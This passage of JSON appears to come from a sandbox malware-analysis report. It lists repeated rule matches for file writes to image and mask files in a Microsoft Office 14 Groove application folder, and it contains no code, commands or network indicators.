"ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24478", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackground.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierBackgroundRTL.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackgroundrtl.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24485", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierbackgroundrtl.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierCloseButton.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierclosebutton.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24494", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierclosebutton.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableDownArrow.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisabledownarrow.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24501", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisabledownarrow.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDisableUpArrow.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisableuparrow.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24508", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdisableuparrow.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierDownArrow.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdownarrow.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24515", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierdownarrow.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierUpArrow.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifieruparrow.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24522", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifieruparrow.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24529", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\NotifierWindowMaskRTL.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmaskrtl.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24536", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\notifierwindowmaskrtl.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24543", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutlineToolIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24550", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outlinetooliconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24557", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\OutofSyncIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24564", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\outofsynciconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24571", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimages.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\PicturesToolIconImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24580", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\picturestooliconimagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIcon.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questionicon.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24587", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questionicon.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\QuestionIconMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questioniconmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24594", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\questioniconmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16Images.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16images.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24601", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16images.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared16x16ImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16imagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24610", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared16x16imagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24Images.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24images.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24617", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24images.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\Shared24x24ImagesMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24imagesmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24624", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\shared24x24imagesmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\SketchIconImages.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\sketchiconimages.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24631", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\sketchiconimages.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupicons.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupicons.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24638", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupicons.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\spacebackupiconsmask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupiconsmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24645", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\spacebackupiconsmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\STOPICON.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopicon.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24652", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopicon.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\StopIconMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopiconmask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24659", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\stopiconmask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImages256Colors.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimages256colors.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24666", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimages256colors.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TaskbarIconImagesMask256Colors.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24673", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\taskbariconimagesmask256colors.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImage.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimage.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24680", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimage.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\TipsImageMask.bmp", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimagemask.bmp", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24687", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\tipsimagemask.bmp\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\VeriSignLogo.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\verisignlogo.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_24694", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\verisignlogo.jpg\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolBMPs\\WebToolIconImages.jpg", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\groove\\toolbmps\\webtooliconimages.jpg", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], 